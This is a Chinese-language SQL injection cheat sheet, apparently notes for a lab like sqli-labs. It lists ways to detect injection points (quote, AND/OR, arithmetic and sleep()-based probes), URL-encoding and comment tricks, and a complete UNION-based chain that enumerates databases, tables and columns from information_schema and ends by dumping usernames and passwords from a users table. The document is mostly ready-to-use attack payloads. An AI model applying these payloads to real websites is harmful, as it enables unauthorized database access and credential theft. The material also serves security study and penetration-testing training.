get单引号判断
?id=1 正常
?id=1' 显示错误则存在sql注入
get and判断
?id=1 and 1=1
?iid=1' and 1=1如果报错,那就存在sql,在请求字符串或者id参数后面加入'(单引号)是一种常见的判断是否存在sql注入的方法
Or、xor判断
和and差不多
sql运算符判断
?id=5-0
?id=5-1
?id=5+1
通过判别获取的内容是否一致,内容不一致则说明存在sql注入,因为存在了你输入的payload运算执行
通过sleep函数演示来判断
?id=1' and if(left(database(),1)='s',sleep(3),1)--+
left()函数:left(database(),1)='s’
left(a,b)从左侧截取a的前b位,正确则返回1,错误则返回0。
例:left(database(),1)=‘s’; 前1位是否是s。
服务端返回错误形式
错误直接回显在页面上
错误隐藏在页面源代码中
检测到错误跳转到另一个页面
返回HTTP错误代码500或重定向302
适当处理错误结果,常显示一个通用错误页面
其它方法
了解post、get、编码
常用'or and 1=1 # 'or and 1=1 –-+
井号 #是sql语句中的注释符;
加号+ 在http请求中表示空格;
-- 后面的语句相当于被注释掉,不执行后面的sql语句;
--+代表闭合sql查询语句,如果没加,无法形成有效的mysql语句,这是sql注入中常见的巧妙运用。
在post参数中
要加空格符,直接输入空格服即可;用+会被http请求转义为%2B编码;
在get请求中
在get请求中如果有空格,需要用空格符编码%20来替代,不然会请求报错;
如果用#表示不提交#后面的参数到服务端,但是转成%23编码就可以提交过去;
常见URL编码
空格 %20
+%2b
<%3c
大于 >%3e
sql注入常用mysql函数
order by
发现注入点
输入?id=1 正常;
输入?id=1'报错,就存在sql注入漏洞。
猜id=1显示条件中表的字段
例如输入?id=1' order by 3 --+ 显示正常
再次输入?id=1' order by 4 --+ 显示错误
所以的出,在?id=1查看的这个表有3个字段
仔细想想,为什么不是?id=1或者id=1'呢?后面为什么要加--+呢?
爆开数据库
?id=-1' union select 1,2,database() --+
爆开数据表
?id=0' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+
爆开数据列(字段名)
?id=0' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' --+
爆开数据值
?id=0' union select 1,group_concat(username,0x3a,password),3 from users--+
